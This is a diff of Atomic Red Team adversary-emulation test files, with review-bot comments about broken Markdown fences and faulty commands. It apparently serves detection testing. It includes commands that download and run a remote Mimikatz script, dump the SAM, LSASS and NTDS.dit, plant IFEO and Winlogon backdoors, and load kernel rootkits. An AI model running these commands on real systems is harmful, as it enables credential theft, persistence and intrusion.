diff --git a/atomics/T1002/T1002.md b/atomics/T1002/T1002.md
index 956d1344..0288b4a2 100644
--- a/atomics/T1002/T1002.md
+++ b/atomics/T1002/T1002.md
@@ -29,8 +29,7 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
| input_file | Path that should be compressed into our output file | Path | C:\*|
| output_file | Path where resulting compressed data should be placed | Path | C:\test\Data.zip|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
```
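Review bot: The added line `#### Run it with `powershell`! ```` breaks the Markdown rendering: a fence only opens a code block when it starts its own line, so here the ``` becomes inline text in the heading, and the lone ``` two lines later then opens an unterminated block that swallows everything after it. Keep the heading and the opening fence on separate lines, as the removed lines had them; the same merge is repeated in every hunk of this patch, so if these files are produced from a template the missing newline should be fixed there rather than per file. While touching this, tagging the fence with its language (```powershell, ```sh, ```cmd) would give readers syntax highlighting and let tooling run the right interpreter.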
@@ -48,8 +47,7 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
| input_file | Path that should be compressed into our output file | Path | *.docx|
| output_file | Path where resulting compressed data should be placed | Path | exfilthis.rar|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
rar a -r #{output_file} #{input_file}
```
@@ -67,8 +65,7 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
| input_files | Path that should be compressed into our output file, may include wildcards | Path | /tmp/victim-files/*|
| output_file | Path that should be output as a zip archive | Path | /tmp/victim-files.zip|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
zip #{output_file} #{input_files}
```
@@ -85,8 +82,7 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
|------|-------------|------|---------------|
| input_file | Path that should be compressed | Path | /tmp/victim-gzip.txt|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
gzip -f #{input_file}
```
@@ -104,8 +100,7 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
| input_file_folder | Path that should be compressed | Path | /tmp/victim-files/|
| output_file | File that should be output | Path | /tmp/victim-files.tar.gz|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
tar -cvzf #{output_file} #{input_file_folder}
```
diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md
index 768817ec..fe0820f5 100644
--- a/atomics/T1003/T1003.md
+++ b/atomics/T1003/T1003.md
@@ -169,8 +169,7 @@ Dumps Credentials via Powershell by invoking a remote mimikatz script
|------|-------------|------|---------------|
| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
```
@@ -182,8 +181,7 @@ https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
gsecdump -a
```
@@ -200,8 +198,7 @@ http://www.ampliasecurity.com/research/windows-credentials-editor/
|------|-------------|------|---------------|
| output_file | Path where resulting data should be placed | Path | output.txt|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
wce -o #{output_file}
```
@@ -214,8 +211,7 @@ via three registry keys. Then processed locally using https://github.com/Neohaps
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security
@@ -235,8 +231,7 @@ ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysin
|------|-------------|------|---------------|
| output_file | Path where resulting dump should be placed | Path | lsass_dump.dmp|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
procdump.exe -accepteula -ma lsass.exe #{output_file}
```
@@ -249,8 +244,7 @@ Manager and administrative permissions.
**Supported Platforms:** Windows
-#### Run it with these steps!
-1. Open Task Manager:
+#### Run it with these steps! 1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
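Review bot: Merging `1. Open Task Manager:` into the heading line removes the first item of the numbered list, so the remaining steps start at 2 and the indented explanation under step 1 renders as a plain paragraph under the heading. Keep the heading and the first list item on separate lines.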
@@ -277,8 +271,7 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
|------|-------------|------|---------------|
| input_file | Path where resulting dump should be placed | Path | lsass_dump.dmp|
-#### Run it with these steps!
-1. Open Mimikatz:
+#### Run it with these steps! 1. Open Mimikatz:
Execute `mimikatz` at a command prompt.
2. Select a Memory Dump:
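Review bot: Same list breakage as the Task Manager test: `1. Open Mimikatz:` is pulled into the heading, so the procedure starts at `2. Select a Memory Dump:` and step 1's text is orphaned. Put the first step back on its own line.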
@@ -304,8 +297,7 @@ subsequent domain controllers without the need of network-based replication.
|------|-------------|------|---------------|
| output_folder | Path where resulting dump should be placed | Path | C:\Atomic_Red_Team|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q
```
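Review bot: Beyond the fence merge, the context line `ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q` uses curly quotes, which cmd.exe does not treat as quoting characters, and the last quote is unbalanced, so the command will not parse as the intended four ntdsutil arguments. It should read `ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q` with straight quotes and the closing quote after the folder.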
@@ -322,8 +314,7 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon) | String | C:|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
vssadmin.exe create shadow /for=#{drive_letter}
```
@@ -345,8 +336,7 @@ This test must be executed on a Windows Domain Controller.
| vsc_name | Name of Volume Shadow Copy | String | \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1|
| extract_path | Path for extracted NTDS.dit | Path | C:\Extract|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
diff --git a/atomics/T1004/T1004.md b/atomics/T1004/T1004.md
index 01b4d876..0a497269 100644
--- a/atomics/T1004/T1004.md
+++ b/atomics/T1004/T1004.md
@@ -32,8 +32,7 @@ PowerShell code to set Winlogon shell key to execute a binary at logon along wit
|------|-------------|------|---------------|
| binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force
```
@@ -50,8 +49,7 @@ PowerShell code to set Winlogon userinit key to execute a binary at logon along
|------|-------------|------|---------------|
| binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
```
@@ -68,8 +66,7 @@ PowerShell code to set Winlogon Notify key to execute a notification package DLL
|------|-------------|------|---------------|
| binary_to_execute | Path of notification package to execute | Path | C:\Windows\Temp\atomicNotificationPackage.dll|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
```
diff --git a/atomics/T1005/T1005.md b/atomics/T1005/T1005.md
index 52e7c770..5256f06a 100644
--- a/atomics/T1005/T1005.md
+++ b/atomics/T1005/T1005.md
@@ -22,8 +22,7 @@ This test uses `grep` to search a macOS Safari binaryCookies file for specified
|------|-------------|------|---------------|
| search_string | String to search Safari cookies to find. | string | coinbase|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
cd ~/Library/Cookies
grep -q "#{search_string}" "Cookies.binarycookies"
```
diff --git a/atomics/T1007/T1007.md b/atomics/T1007/T1007.md
index ebad1753..3c5471b8 100644
--- a/atomics/T1007/T1007.md
+++ b/atomics/T1007/T1007.md
@@ -22,8 +22,7 @@ Identify system services
|------|-------------|------|---------------|
| service_name | Name of service to start stop, query | string | svchost.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
tasklist.exe
sc query
sc query state= all
@@ -45,8 +44,7 @@ Enumerates started system services using net.exe and writes them to a file. This
|------|-------------|------|---------------|
| output_file | Path of file to hold net.exe output | Path | C:\Windows\Temp\service-list.txt|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
net.exe start >> #{output_file}
```
diff --git a/atomics/T1009/T1009.md b/atomics/T1009/T1009.md
index 2362559e..532af8e9 100644
--- a/atomics/T1009/T1009.md
+++ b/atomics/T1009/T1009.md
@@ -20,8 +20,7 @@ Uses dd to add a zero to the binary to change the hash
|------|-------------|------|---------------|
| file_to_pad | Path of binary to be padded | Path | /tmp/evil-binary|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
```
diff --git a/atomics/T1010/T1010.md b/atomics/T1010/T1010.md
index 0d45205c..d2a68afc 100644
--- a/atomics/T1010/T1010.md
+++ b/atomics/T1010/T1010.md
@@ -23,8 +23,7 @@ Compiles and executes C# code to list main window titles associated with each pr
| input_source_code | Path to source of C# code | path | C:\AtomicRedTeam\atomics\T1010\src\T1010.cs|
| output_file_name | Name of output binary | string | T1010.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code}
#{output_file_name}
```
diff --git a/atomics/T1012/T1012.md b/atomics/T1012/T1012.md
index 02ee4fc5..5ceb2028 100644
--- a/atomics/T1012/T1012.md
+++ b/atomics/T1012/T1012.md
@@ -28,8 +28,7 @@ https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
diff --git a/atomics/T1014/T1014.md b/atomics/T1014/T1014.md
index 560a570f..62cff54e 100644
--- a/atomics/T1014/T1014.md
+++ b/atomics/T1014/T1014.md
@@ -26,8 +26,7 @@ Loadable Kernel Module based Rootkit
|------|-------------|------|---------------|
| rootkit_file | Path To Module | String | Module.ko|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sudo insmod #{rootkit_file}
```
@@ -44,8 +43,7 @@ Loadable Kernel Module based Rootkit
|------|-------------|------|---------------|
| rootkit_file | Path To Module | String | Module.ko|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sudo modprobe #{rootkit_file}
```
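Review bot: `sudo modprobe #{rootkit_file}` with the default value `Module.ko` will not load the file: modprobe resolves module names against `/lib/modules/$(uname -r)` after `depmod`, not file paths, so it fails with a module-not-found error unless the `.ko` has been installed there first. Either document that prerequisite for this test or point the default at a module name rather than a path; the preceding `insmod` test is the one that takes a path.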
@@ -69,8 +67,7 @@ It would be wise if you only run this in a test environment
|------|-------------|------|---------------|
| driver_path | Path to the vulnerable driver | Path | C:\Drivers\driver.sys|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
puppetstrings #{driver_path}
```
diff --git a/atomics/T1015/T1015.md b/atomics/T1015/T1015.md
index 07be8405..f692fd90 100644
--- a/atomics/T1015/T1015.md
+++ b/atomics/T1015/T1015.md
@@ -48,8 +48,7 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | osk.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```
@@ -66,8 +65,7 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | sethc.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```
@@ -84,8 +82,7 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | utilman.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```
@@ -102,8 +99,7 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | magnify.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```
@@ -120,8 +116,7 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | narrator.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```
@@ -138,8 +133,7 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | DisplaySwitch.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```
@@ -156,8 +150,7 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | atbroker.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```
diff --git a/atomics/T1016/T1016.md b/atomics/T1016/T1016.md
index e883ea7d..e48be6ac 100644
--- a/atomics/T1016/T1016.md
+++ b/atomics/T1016/T1016.md
@@ -17,8 +17,7 @@ Identify network configuration information
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
ipconfig /all
netsh interface show
arp -a
@@ -34,8 +33,7 @@ Identify network configuration information
**Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
arp -a
netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c
ifconfig
diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md
index c0e5d778..ed10dabd 100644
--- a/atomics/T1018/T1018.md
+++ b/atomics/T1018/T1018.md
@@ -35,8 +35,7 @@ Identify remote systems with net.exe
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
net view /domain
net view
```
@@ -49,8 +48,7 @@ Identify remote systems via ping sweep
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
```
@@ -62,8 +60,7 @@ Identify remote systems via arp
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
arp -a
```
@@ -75,8 +72,7 @@ Identify remote systems via arp
**Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
arp -a | grep -v '^?'
```
@@ -88,8 +84,7 @@ Identify remote systems via ping sweep
**Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip -o; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done
```
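Review bot: The `-o` flag on the context line is a BSD/macOS ping option (exit after the first reply); the iputils ping shipped on Linux rejects it, so this `sh` test fails on one of its two listed platforms. `-c 1` already stops after a single packet and returns a non-zero exit status when there is no reply, so dropping `-o` makes the loop portable without changing its behaviour.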
diff --git a/atomics/T1022/T1022.md b/atomics/T1022/T1022.md
index 93c58c81..82a3d4c0 100644
--- a/atomics/T1022/T1022.md
+++ b/atomics/T1022/T1022.md
@@ -23,8 +23,7 @@ Encrypt data for exiltration
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
echo "This file will be encrypted" > /tmp/victim-gpg.txt
mkdir /tmp/victim-files
cd /tmp/victim-files
@@ -44,8 +43,7 @@ rar a -p"blue" hello.rar (VARIANT)
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
mkdir ./tmp/victim-files
cd ./tmp/victim-files
echo "This file will be encrypted" > ./encrypted_file.txt
@@ -62,8 +60,7 @@ wzzip sample.zip -s"blueblue" *.txt (VARIANT)
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
path=%path%;"C:\Program Files (x86)\winzip"
mkdir ./tmp/victim-files
cd ./tmp/victim-files
@@ -80,8 +77,7 @@ Note: Requires 7zip installation
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
mkdir ./tmp/victim-files
cd ./tmp/victim-files
echo "This file will be encrypted" > ./encrypted_file.txt
diff --git a/atomics/T1027/T1027.md b/atomics/T1027/T1027.md
index 00975b3b..94f3e137 100644
--- a/atomics/T1027/T1027.md
+++ b/atomics/T1027/T1027.md
@@ -23,8 +23,7 @@ Creates a base64-encoded data file and decodes it into an executable shell scrip
**Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sh -c "echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat"
cat /tmp/encoded.dat | base64 -d > /tmp/art.sh
chmod +x /tmp/art.sh
diff --git a/atomics/T1028/T1028.md b/atomics/T1028/T1028.md
index 46137e06..1926fa0a 100644
--- a/atomics/T1028/T1028.md
+++ b/atomics/T1028/T1028.md
@@ -23,8 +23,7 @@ Powershell Enable WinRM
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
Enable-PSRemoting -Force
```
@@ -45,8 +44,7 @@ https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-applicatio
|------|-------------|------|---------------|
| computer_name | Name of Computer | string | computer1|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
```
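Review bot: The property name `Documnet` on the context line is a typo for `Document`; PowerShell will throw a property-not-found error before `ExecuteShellCommand` is reached, so this test cannot currently exercise the technique. Worth fixing alongside the fence since the line is already in the hunk.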
@@ -65,8 +63,7 @@ Utilize WMIC to start remote process
| password | Password | String | P@ssw0rd1|
| computer_name | Target Computer Name | String | Target|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
```
@@ -85,8 +82,7 @@ Utilize psexec to start remote process
| password | Password | String | P@ssw0rd1|
| computer_name | Target Computer Name | String | Target|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
psexec \\host -u domain\user -p password -s cmd.exe
```
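Review bot: The command hard-codes `\\host -u domain\user -p password` while the input table in this hunk defines `user_name`, `password` and `computer_name`, none of which are substituted. It should use `#{computer_name}`, `#{user_name}` and `#{password}` so the documented inputs actually drive the test.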
@@ -104,8 +100,7 @@ Execute Invoke-command on remote host
| host_name | Remote Windows Host Name | String | Test|
| remote_command | Command to execute on remote Host | String | ipconfig|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
invoke-command -computer_name #{host_name} -scriptblock {#{remote_command}}
```
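Review bot: `invoke-command -computer_name #{host_name}` uses a parameter that Invoke-Command does not have; the cmdlet's parameter is `-ComputerName`, and the underscore form looks like the YAML input name leaking into the command. PowerShell will fail with a parameter-not-found error, so fix the parameter name here.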
diff --git a/atomics/T1030/T1030.md b/atomics/T1030/T1030.md
index 75ec66b6..d101540e 100644
--- a/atomics/T1030/T1030.md
+++ b/atomics/T1030/T1030.md
@@ -15,8 +15,7 @@ Take a file/directory, split it into 5Mb chunks
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
cd /tmp/
dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1
split -b 5000000 /tmp/victim-whole-file
diff --git a/atomics/T1031/T1031.md b/atomics/T1031/T1031.md
index 121ab272..4ebe169d 100644
--- a/atomics/T1031/T1031.md
+++ b/atomics/T1031/T1031.md
@@ -20,8 +20,7 @@ and will then revert the binPath change, restoring Fax to its original state.
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1031 Test'\""
sc start Fax
sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe"
diff --git a/atomics/T1033/T1033.md b/atomics/T1033/T1033.md
index d8513de8..a6fa0b62 100644
--- a/atomics/T1033/T1033.md
+++ b/atomics/T1033/T1033.md
@@ -32,8 +32,7 @@ Identify System owner or users on an endpoint
|------|-------------|------|---------------|
| computer_name | Name of remote computer | string | computer1|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
cmd.exe /C whoami
wmic useraccount get /ALL
quser /SERVER:"#{computer_name}"
@@ -52,8 +51,7 @@ Identify System owner or users on an endpoint
**Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
users
w
who
diff --git a/atomics/T1035/T1035.md b/atomics/T1035/T1035.md
index d3c5c675..7cb247e6 100644
--- a/atomics/T1035/T1035.md
+++ b/atomics/T1035/T1035.md
@@ -21,8 +21,7 @@ Creates a service specifying an aribrary command and executes it. When executing
| service_name | Name of service to create | string | ARTService|
| executable_command | Command to execute as a service | string | %COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
sc.exe create #{service_name} binPath= #{executable_command}
sc.exe start #{service_name}
sc.exe delete #{service_name}
diff --git a/atomics/T1036/T1036.md b/atomics/T1036/T1036.md
index 1860baed..de06418b 100644
--- a/atomics/T1036/T1036.md
+++ b/atomics/T1036/T1036.md
@@ -31,8 +31,7 @@ Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsas
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
cmd.exe /c %SystemRoot%\Temp\lsass.exe
```
@@ -45,8 +44,7 @@ Copies sh process, renames it as crond, and executes it to masquerade as the cro
**Supported Platforms:** Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
cp /bin/sh /tmp/crond
/tmp/crond
```
diff --git a/atomics/T1037/T1037.md b/atomics/T1037/T1037.md
index b1cf6169..65f9f38f 100644
--- a/atomics/T1037/T1037.md
+++ b/atomics/T1037/T1037.md
@@ -30,8 +30,7 @@ Added Via Reg.exe
|------|-------------|------|---------------|
| script_command | Command To Execute | String | cmd.exe /c calc.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "#{script_command}"
```
@@ -43,8 +42,7 @@ Mac logon script
**Supported Platforms:** macOS
-#### Run it with these steps!
-1. Create the required plist file
+#### Run it with these steps! 1. Create the required plist file
sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist
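Review bot: As with the other step-based tests, `1. Create the required plist file` has been pulled into the heading, so the `sudo touch ...` line is no longer nested under a numbered step. Keep the heading and the first step on separate lines.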
diff --git a/atomics/T1040/T1040.md b/atomics/T1040/T1040.md
index 5f97548d..3c55520d 100644
--- a/atomics/T1040/T1040.md
+++ b/atomics/T1040/T1040.md
@@ -30,8 +30,7 @@ Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be in
|------|-------------|------|---------------|
| interface | Specify interface to perform PCAP on. | String | ens33|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
tcpdump -c 5 -nnni #{interface}
tshark -c 5 -i #{interface}
```
@@ -49,8 +48,7 @@ Perform a PCAP on MacOS. This will require Wireshark/tshark to be installed. TCP
|------|-------------|------|---------------|
| interface | Specify interface to perform PCAP on. | String | en0A|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
tcpdump -c 5 -nnni #{interface}
tshark -c 5 -i #{interface}
```
@@ -69,8 +67,7 @@ installed, along with WinPCAP. Windump will require the windump executable.
|------|-------------|------|---------------|
| interface | Specify interface to perform PCAP on. | String | Ethernet0|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
c:\Program Files\Wireshark\tshark.exe -i #{interface} -c 5
c:\windump.exe
```
@@ -89,8 +86,7 @@ installed, along with WinPCAP. Windump will require the windump executable.
|------|-------------|------|---------------|
| interface | Specify interface to perform PCAP on. | String | Ethernet0|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
c:\Program Files\Wireshark\tshark.exe -i #{interface} -c 5
c:\windump.exe
```
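Review bot: In the `powershell` variant the unquoted path `c:\Program Files\Wireshark\tshark.exe -i #{interface} -c 5` is a parse error, since PowerShell stops the command name at the space; it needs the call operator and quotes, `& "c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5`. The `command_prompt` variant in the previous hunk has the same problem, where cmd reports `'c:\Program' is not recognized`, and `c:\windump.exe` on its own runs with no interface or packet count in either variant.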
diff --git a/atomics/T1042/T1042.md b/atomics/T1042/T1042.md
index 960fe846..6ecbbe9b 100644
--- a/atomics/T1042/T1042.md
+++ b/atomics/T1042/T1042.md
@@ -28,8 +28,7 @@ Change Default File Association From cmd.exe
| extension_to_change | File Extension To Hijack | String | .wav|
| target_exenstion_handler | Thing To Open | Path | C:\Program Files\Windows Media Player\wmplayer.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
cmd.exe /c assoc #{extension_to_change}="#{target_exenstion_handler}"
```
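Review bot: `assoc` maps an extension to a file type name, not to a program, so `assoc .wav="C:\...\wmplayer.exe"` only sets the type name to that path and does not change what opens the file; the type-to-command mapping is `ftype`. The test should either pair `assoc .wav=SomeType` with `ftype SomeType="C:\...\wmplayer.exe" "%1"` or be reworded. The input name `target_exenstion_handler` also has a typo (`extension`) that is repeated in the command.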
diff --git a/atomics/T1046/T1046.md b/atomics/T1046/T1046.md
index 53abc0c4..146b6eaf 100644
--- a/atomics/T1046/T1046.md
+++ b/atomics/T1046/T1046.md
@@ -17,8 +17,7 @@ Scan ports to check for listening ports
**Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
for port in {1..65535};
do
echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ;
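Review bot: This test is labelled `sh` but relies on bash features: `{1..65535}` brace expansion and the `/dev/tcp/host/port` pseudo-device are bash-only, so under a POSIX `sh` (dash on Debian/Ubuntu) the loop runs once with the literal string `{1..65535}` and the redirect fails. Label it `bash` as the T1040 tests do, and the trailing ` : ;` after the `echo` is a stray no-op that should be dropped.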
@@ -40,8 +39,7 @@ Scan ports to check for listening ports with Nmap.
| port | Ports to scan. | string | 80|
| host | Host to scan. | string | 192.168.1.1|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
diff --git a/atomics/T1047/T1047.md b/atomics/T1047/T1047.md
index d94e6c0d..c31acd34 100644
--- a/atomics/T1047/T1047.md
+++ b/atomics/T1047/T1047.md
@@ -23,8 +23,7 @@ WMI List User Accounts
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
wmic useraccount get /ALL
```
@@ -36,8 +35,7 @@ WMI List Processes
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
